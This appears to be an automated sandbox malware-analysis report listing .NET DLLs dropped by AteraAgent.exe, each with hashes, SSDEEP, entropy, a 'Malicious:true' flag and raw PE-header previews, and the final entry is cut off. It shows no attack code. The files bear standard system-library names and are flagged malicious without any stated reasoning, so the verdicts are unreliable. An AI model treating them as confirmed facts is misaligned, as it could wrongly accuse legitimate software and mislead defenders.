                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ...............................*....@..................................,..O....@..................((...`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r;..p.(....*2ro..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rK..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rM..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.809826405533208
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:jzNnzx7FWjYW5mPVNyby2sE9jBF6IYiYF85S35IVnxGUHF8oymi9LJxz:/RtRWjYWw9Nyb8E9VF6IYijSJIVxIhxz
                                                                                                                                                                                                                                        MD5:03632BEE2A8C4399C7A6638E77B7BDF5
                                                                                                                                                                                                                                        SHA1:29D83EED2A94F58D7B9D5D9993E305111B3F9458
                                                                                                                                                                                                                                        SHA-256:B4326EDB65AF72D07E07BEFCCE899F940AC28F2AA3E0B83130722A263B8F7376
                                                                                                                                                                                                                                        SHA-512:B1408BE605FDA4B7FFF8E911C01AB0BCC60E084B9C99D366388A13875B1F080FC3812205DA14A24A6E777EFC83EA19832CBB85E38BF6CBA40E28CFFE049EC8BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................%.....@.................................x*..O....@..@...............((...`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8927438121416635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:peWnoW7zNyb8E9VF6IYijSJIVxG1+MsaR:pnJvEpYi601MJ
                                                                                                                                                                                                                                        MD5:F37DE5A355ED1ABC75C046F27BC2F4B1
                                                                                                                                                                                                                                        SHA1:C972C7CBC306499908E10E2482D862871D8C716B
                                                                                                                                                                                                                                        SHA-256:CCA3B1E53F1423D56CDED1D310B473989C38E342F6345B46E96409CAAA647740
                                                                                                                                                                                                                                        SHA-512:4A023C1226026B26C9FCD701BDFE2E1672D43B513D4E0F5602B71CB0C96C305F8B46AD8A28C33694890FB0AC4F753D460841B04549A4B39FEE4CB3C17838C03F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................zH....@.................................X)..O....@..$...............((...`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99368
                                                                                                                                                                                                                                        Entropy (8bit):6.236464835220594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:qgDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbaD7633My:9itRK/XIgIZAXjD96WfLtGdM5baDw
                                                                                                                                                                                                                                        MD5:0A8B3D6653A19A29D8C8F2A5A50386D7
                                                                                                                                                                                                                                        SHA1:86380F961B9328B5FFC631BDD71A391A5864D35D
                                                                                                                                                                                                                                        SHA-256:8D99AF407453D0A0C9866C3354853973DAE96E2F57809EBB80420CF024B4CD7F
                                                                                                                                                                                                                                        SHA-512:D4E8F91BB41874F19F91A39BC6C2E0EEFFE4459502E9A1C96149F96B0D8E6D28E176C589BDB70EEE8A3993A0D14AF4047519616448B9B43C1394276C6F331B9F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.#..........." ..0..R...........o... ........... ..............................n.....`..................................o..O....................\..((...........n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B.................o......H.......4................e.. ....n........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.853023049206083
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:E6oWJjWN3Nyb8E9VF6IYijSJIVxukXvjY:E6vk7EpYi60h7Y
                                                                                                                                                                                                                                        MD5:A906375106043CAEFDE3976F6C8AB9D4
                                                                                                                                                                                                                                        SHA1:6204B5F51841B7AE4495A51FACD85F297FF97C10
                                                                                                                                                                                                                                        SHA-256:37F3C382C8AB3940133B5ABA569EE4AB19FEB812A84DC6FB375E5C73DD5793EF
                                                                                                                                                                                                                                        SHA-512:5F2901F3CE2F8AA40236C5830544A18D32FB92DFBDE51D43531F966F46E61597A31CB59C3434DDB01D10D5F715DD74923A174A51C9BBC86E227D3F18778BAD1E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@.................................H(..O....@..p...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.777238182826117
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:yqk53/hW3fZ+zWqyNyb8E9VF6IYijSJIVxjYCFe:yqk53MmSEpYi600ke
                                                                                                                                                                                                                                        MD5:CEA95C8FE05E4AC7F101EEE6F3DA67E9
                                                                                                                                                                                                                                        SHA1:75388B7B7EC97F278AE11AB1B9143A8F47D2148E
                                                                                                                                                                                                                                        SHA-256:0942BC5F9434099E8AEF7C512589990F553E58F4CBF4C603ECA1DBD68A44A805
                                                                                                                                                                                                                                        SHA-512:5B2E070E6CDEF67712D04F9FED6232E1BACC9FCBEEDEAAF8422A107DCC53AFA74D3446AA70901792034673F3ED61E8EA85135A95779B225500289376817893E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............**... ...@....... ..............................e.....@..................................)..O....@..0...............((...`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................*......H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17960
                                                                                                                                                                                                                                        Entropy (8bit):6.660095127054316
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:kFCc4Y4OJWfOWqWWOW7yNyb8E9VF6IYijSJIVxwO0taA:wCcyCrSEpYi60A7
                                                                                                                                                                                                                                        MD5:614FD8917DDAAAE2CBF088758C73914B
                                                                                                                                                                                                                                        SHA1:C379035B13A5D070B4A943EBB8BB01EE543674C7
                                                                                                                                                                                                                                        SHA-256:EDD5EA3BF48C308839100BF8E3FECD0ABD0946D6A0DEC23AF945C613AA06743A
                                                                                                                                                                                                                                        SHA-512:365B2E6A664B550E74316A7EF6F57ABAF93A599792B7E4C3643EF5FDE4E20A4FCDB1D0F0753F6D4E178897EA2A802D85007408AA13439C2D0DF1B118341EB962
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ...................................@..................................-..O....@..................((...`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....*6.o.....(....*6.o..........**.o.......*.~....*.~....*.BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.|.....Z...1.Z.....$.....$.......3.D.......|...F.|...c.|.....|.....|.....|.....|.....|.....Z...I.|...}.Z.....Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.872731468371506
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:GlTx93aWxMW5XPqNyby2sE9jBF6IYiYF85S35IVnxGUHFwPtr06Um:uAWxMWxiNyb8E9VF6IYijSJIVxMPtrxr
                                                                                                                                                                                                                                        MD5:93711124171608F9B42E4B2181484D43
                                                                                                                                                                                                                                        SHA1:E2904EBF5CF652EB87B6AA095CB33F830A506916
                                                                                                                                                                                                                                        SHA-256:CE38259EB6E894014FCF7B86F378F80181C54AC66DB0B6AB50747F7EE1801723
                                                                                                                                                                                                                                        SHA-512:7A309EC9697E31441AE05CEA45454ECC62E6CB09059E033E73751695A24C5BCF3C37494DAD56FE6A1E376FD9E14AB5D6DB259FE5C412E9C99433D1C2ED19980E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..................((...`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.854587687942687
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:7YqArxbYWHaW5oPINyby2sE9jBF6IYiYF85S35IVnxGUHF2zfxGoKDM3W:TAlcWHaWOQNyb8E9VF6IYijSJIVxyo/N
                                                                                                                                                                                                                                        MD5:DDAFBA73BDD9BB3E0FB95B743D55CB3E
                                                                                                                                                                                                                                        SHA1:17622DE666A4F3A926F6999D6FF0813A0F0E9788
                                                                                                                                                                                                                                        SHA-256:F955DDF9ED01345FFCD404F723407EB610BBB6BF38BB105D4FEF37B15C27E0C4
                                                                                                                                                                                                                                        SHA-512:C3BBC2D177E750BE5BEED95A49D32653919F02F583BD239E0BD3D5E94AA3E916768E0F3295DBDB223144673A5A58CD19FA59B627C9E556CFFDE273968D898666
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ...............((...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.774908284976976
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zeIZnWlNWTaNyb8E9VF6IYijSJIVxpcstD0nX:iUyo6EpYi60PonX
                                                                                                                                                                                                                                        MD5:332CBA66AF5A16D8B1B987CCC925F190
                                                                                                                                                                                                                                        SHA1:8C884DDEFC71B1B86321D77D8D191A9B8E3D5066
                                                                                                                                                                                                                                        SHA-256:DF7D583A05D06A5CD414A9850A14052F27164BF878FD0AD915B4BE0FCB996220
                                                                                                                                                                                                                                        SHA-512:B9B384FFB78DD18530E50F46FE07A615E2E8733AF5153EB40751C8C444E3EDD24C7B13EC22D39D82A7840F53E86C5F713D1B05B9F05F39884E9EB26295E45175
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2*... ...@....... ..............................G.....@..................................)..O....@..P...............((...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25640
                                                                                                                                                                                                                                        Entropy (8bit):6.493960742291261
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:KlQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdWZ+Nyb8E9VF61:gQq33333333kX+TBi8OGEpYi60/o
                                                                                                                                                                                                                                        MD5:422211D2F5D7ED59687A37ECE190DDF6
                                                                                                                                                                                                                                        SHA1:E4BE0F7A07DB68D8E43AEC62922C4DDD2F60AB4F
                                                                                                                                                                                                                                        SHA-256:642CF9972708FCA429C836F717FBB3FD9C75369B662FA5D8A71D34A9A91DC304
                                                                                                                                                                                                                                        SHA-512:3157502CBD89ADD0AFFC1D90D47E76BD9B676D5A91F9E47E9606B39E31D016F3CE91C4D74755927C805353256C514E66259E4E11798E9F724F2BE3A3E8918DB7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ..............................DM....@..................................L..O....`..x............<..((..........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8*...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o....*"..(....*....0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....*&...{....*.0..4.................}......+....{.....".......X.....{.....i2.*.0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.849868448509138
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:028YFlXulWY/WGONyb8E9VF6IYijSJIVxKD9Pg:00qX2EpYi60p
                                                                                                                                                                                                                                        MD5:CB32C6061E26B386584BD9CB8937DD9F
                                                                                                                                                                                                                                        SHA1:B09E73D9C57310B7BF39F2B7B763EBECF9EFF305
                                                                                                                                                                                                                                        SHA-256:97A015EED33967F01157B982FC96ABCBA333191DFB97B793397EEA9CB1BA2B06
                                                                                                                                                                                                                                        SHA-512:8CC362FC3FD0BCE42AD3E4F22B538E7B9B377C63CE992F30C0559BF1AEBB63701AE36CC76054DF9C0358E451A0E22DFB7C081C8465576B327040F42E932DF4E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................7.....@..................................(..O....@.. ...............((...`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.724457027062359
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ruMLcdQ5MW9MWYONyb8E9VF6IYijSJIVx3g5:6OcSpS2EpYi60I
                                                                                                                                                                                                                                        MD5:0749DE023247060FA69D5005B72D05F5
                                                                                                                                                                                                                                        SHA1:BCD4585CFADD7A3256D079DBB7377562E960A734
                                                                                                                                                                                                                                        SHA-256:F0F2AA6075B738A8895C69713DCC754505E273665A0559BE5F9C06DCB21A3E04
                                                                                                                                                                                                                                        SHA-512:620738F6725672A0BC54D57FDE5D594108AC24AE5C8C743E8C15E18FC84A2170608926576C4C0A51E606DDA9BBA6586EB34AFBDA2A35E1479F1DF6B421000306
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ...............................O....@..................................+..O....@..................((...`.......*............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.814273587968228
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AZ7RqXWDRqlRqj0RqFWqENyb8E9VF6IYijSJIVxVaIo6:09qKqjqjuq5kEpYi60C6
                                                                                                                                                                                                                                        MD5:8D2C2CD9B68FF4ACEE1FB4C2834F3B5E
                                                                                                                                                                                                                                        SHA1:66913E4F8AA71EA16BDCCEC87A832AD850D1C9C0
                                                                                                                                                                                                                                        SHA-256:DEEF6D89C2DBE482F43CE4BA7B242660D9565810BB1FCBC2D8A37D8E88090F14
                                                                                                                                                                                                                                        SHA-512:CA27C949CD9A3F0BE7CBFB0D8C82AF3F5FC552F5DBF1F84AB5DF25FCCFA0917D23955D92E64D5C7977FE26D37555107CC8FD7EB3834080DE0C5667419076298B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................7y....@.................................X*..O....@..P...............((...`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20008
                                                                                                                                                                                                                                        Entropy (8bit):6.625657997130846
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:eNBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W7eNyb8E9VF6IYijSJIVx3xH:evMhF2SzNzwu/NljuQmEpYi60B
                                                                                                                                                                                                                                        MD5:47C3B21FFC0966C506F850F723D358D0
                                                                                                                                                                                                                                        SHA1:033F53B07F6F3D17BEDEF483B251DFA41EE3258F
                                                                                                                                                                                                                                        SHA-256:A53DFA563B37E80C35B139F60B86231F66A64BD3856ECC3A00732C2EE1DB84C5
                                                                                                                                                                                                                                        SHA-512:8FE75506398A62EBA831331BFED8F32C84BC6F4641D6DE6C98F6152BC8CD1AFB3B3C0AA6A49F803791D3989700C99C5EC511584ABD0112B239D35B56687C0C8A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ....................................@.................................a6..O....@...............&..((...`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o....*"..o....*..o....*"..o....*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*...0..K........-.r1..ps....z. ...@3.(....*. ....3.(....*. ...._,.(....rI..ps..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
